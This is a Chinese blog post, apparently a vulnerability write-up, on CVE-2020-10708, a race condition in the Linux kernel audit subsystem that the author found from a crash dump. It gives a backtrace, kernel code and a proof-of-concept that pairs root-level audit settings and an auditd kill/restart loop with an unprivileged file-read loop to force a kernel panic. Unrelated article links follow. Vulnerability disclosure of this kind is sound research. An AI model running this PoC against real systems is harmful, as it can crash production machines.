从 vmcore 中挖掘出的 CVE

简介: CVE-2020-10708

在某次 kernel panic 的 vmcore 分析中,我发现这可能是一个允许低权限用户或远程攻击者触发的拒绝服务漏洞,经过对调用栈的回溯分析与构造 PoC 验证,并将测试结果提交给 Redhat 后,最终由 Redhat 确认:CVE-2020-10708

漏洞原理

这是一个存在于 audit 子系统的竞争条件漏洞,漏洞原理比较简单,构造漏洞场景也很简单,我们直接通过 vmcore 来看看是怎么发生的。
首先看下 panic 堆栈:

crash> bt
PID: 22814  TASK: ffff8d1b40ea0fd0  CPU: 1   COMMAND: "audispd"
 #0 [ffff8d1b69ee3c60] machine_kexec at ffffffff96a60afa
 #1 [ffff8d1b69ee3cc0] __crash_kexec at ffffffff96b13402
 #2 [ffff8d1b69ee3d90] panic at ffffffff97107a9b
 #3 [ffff8d1b69ee3e10] audit_panic at ffffffff96b271e4
 #4 [ffff8d1b69ee3e28] audit_log_lost at ffffffff96b2722f
 #5 [ffff8d1b69ee3e40] audit_printk_skb at ffffffff96b2743c
 #6 [ffff8d1b69ee3e60] audit_log_end at ffffffff96b27692
 #7 [ffff8d1b69ee3e78] audit_log_exit at ffffffff96b2ce51
 #8 [ffff8d1b69ee3ee8] __audit_syscall_exit at ffffffff96b2f40d
 #9 [ffff8d1b69ee3f20] syscall_trace_leave at ffffffff96a395f4
#10 [ffff8d1b69ee3f48] int_check_syscall_exit_work at ffffffff9711fac2
    RIP: 00007fa2967ab170  RSP: 00007ffc7ce357d0  RFLAGS: 00000200
    RAX: 0000000000000000  RBX: 0000000000000000  RCX: 0000000000000000
    RDX: 0000000000000000  RSI: 0000000000000000  RDI: 0000000000000000
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000000  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000000
    ORIG_RAX: 000000000000003b  CS: 0033  SS: 002b

发生 panic 的函数是:

void audit_panic(const char *message)
{
    switch (audit_failure)
    {
    case AUDIT_FAIL_SILENT:
        break;
    case AUDIT_FAIL_PRINTK:
        if (printk_ratelimit())
            printk(KERN_ERR "audit: %s\n", message);
        break;
    case AUDIT_FAIL_PANIC:
        /* test audit_pid since printk is always losey, why bother? */
        if (audit_pid)
            panic("audit: %s\n", message);  // audit_pid != NULL, panic here
        break;
    }
}

这里触发 panic 需要满足两个条件:

  1. audit_failure 设置成 AUDIT_FAIL_PANIC,AUDIT_FAIL_PANIC 是指示在 audit 失败的时候主动触发 panic;
  2. audit_pid 不为空,即当前 audit 是启用的。

继续回溯发现,在 audit_log_end 中有一处对 audit_pid 的判断:

void audit_log_end(struct audit_buffer *ab)
{
    if (!ab)
        return;
    if (!audit_rate_check()) {
        audit_log_lost("rate limit exceeded");
    } else {
        struct nlmsghdr *nlh = nlmsg_hdr(ab->skb);
        nlh->nlmsg_len = ab->skb->len - NLMSG_HDRLEN;

        if (audit_pid) {
            skb_queue_tail(&audit_skb_queue, ab->skb);
            wake_up_interruptible(&kauditd_wait);
        } else { // audit_pid == NULL 
            audit_printk_skb(ab->skb);
        }
        ab->skb = NULL;
    }
    audit_buffer_free(ab);
}

但这里是在 audit_pid == NULL 时调用 audit_printk_skb,与 audit_panic 中对 audit_pid 的判断结果明显不同,唯一的解释就是:在 audit_log_end 判断 audit_pid 是否为 NULL 时,此时 audit_pid == NULL,进入了 audit_printk_skb,而在这之后,audit_panic 判断 audit_pid 是否为 NULL 之前,由于某些原因(如 auditd 重启),audit_pid 被重新赋值,从而导致 audit_panic 触发 panic。

PoC

从攻击者的角度来说,要触发 panic 的前提是系统管理员(root)设置过 AUDIT_FAIL_PANIC,即 audit 失败后 panic。其次需要等待一小段的窗口期,并在这个窗口期内触发任意一条 audit 规则。一个典型的场景是,在 auditd 重启时,会经历一段 audit_pid 从 NULL 变成非 NULL 的时间,在这个时间里触发的 audit 规则如果恰好满足两个满足上述描述的 audit_log_end 与 audit_panic 对 audit_pid 的判断时机,就能够触发 panic。这其实是一个非常苛刻的条件,但可以通过循环来提高命中的概率。

  1. 【需要 root 权限】设置 AUDIT_FAIL_PANIC 并添加一条任意的 audit 规则:
    `[root@test ~]# cat /etc/audit/rules.d/audit.rules

-D
-b 8192
-f 2
-w /etc/hosts -p rwa -k hosts`

  1. 【需要 root 权限】不断杀死 auditd 进程并启动 auditd,这其实是制造 audit_pid 从 NULL 变成非 NULL 的环境:
    while true; do ps aux | grep "/sbin/auditd" | grep -v "grep" | awk '{print $2}' | xargs kill; service auditd start; systemctl reset-failed auditd.service; done
  2. 【不需要 root 权限】不断触发审计规则:
    while true; do cat /etc/hosts > /dev/null; done
  3. 等待 panic 发生
目录
相关文章
|
弹性计算 安全 Java
使用 OSS 的 bucket 进行文件上传下载|学习笔记
快速学习使用 OSS 的 bucket 进行文件上传下载
1549 0
|
前端开发 JavaScript 小程序
|
30天前
|
自然语言处理 Java 开发工具
《零代码到智能体:蚂蚁百宝箱TBox Agent SDK实战指南》
蚂蚁百宝箱开放OpenAPI/SDK调用智能体,开发者每月享10亿免费token。本文教你如何创建智能体,并用Python、Java等代码快速集成调用,涵盖对话与内容生成应用的构建全流程。
414 0
《零代码到智能体:蚂蚁百宝箱TBox Agent SDK实战指南》
|
IDE 开发工具 C语言
Visual Studio 2017 安装及使用(新手)
Visual Studio 2017 安装及使用(新手)
2062 0
|
存储 Java 区块链
fabric智能合约
fabric智能合约
580 0
|
JSON 安全 数据格式
Python读写yaml排版混乱还丢失注释?我来告诉你解决办法!
日常我们在使用Python读写Yaml时,都是使用推荐的Pyyaml模块。 安装: pip install pyyaml 导入: import yaml 至于操作,简直不要太简单... yaml只有两个方法load、dump,而且使用完全和json模块一样。但真的如此吗?显然不是...
1109 0
|
存储 NoSQL Java
分布式session的几种解决方案,你中意哪种?
在分布式环境下,session就会出现问题了,假如服务端部署在两个服务器A和B上。第一次往购物车添加商品时,请求落在了服务器A上,服务器A创建了一个session,并返回JessionId,第二次往购物车添加商品时,请求落在了服务器B上,请求携带的JesssionId在服务器B上并不会找到对应的session。这时候服务器B就会创建一个新的session,并返回对应的JessionId,客户端发现第一次添加的商品丢失了。。。
1671 0
分布式session的几种解决方案,你中意哪种?
|
Python
Python中的r字符串前缀及其用法详解
Python的r字符串前缀用于创建原始字符串,不解析转义字符。在处理文件路径、正则表达式和特殊字符时特别有用。例如,`r'C:\path'`会保持反斜杠原样,而`'\n'`会被解释为换行。r字符串前缀不能用于变量或表达式,且仅影响字符串本身。了解这一特性有助于编写更清晰、准确的代码。
1204 0
|
存储 Prometheus 监控
使用 Docker 部署 Prometheus + Grafana 监控平台
Prometheus(普罗米修斯R)是一套开源的监控&报警&时间序列数据库的组合,由SoundCloud公司开发。
19952 4
使用 Docker 部署 Prometheus + Grafana 监控平台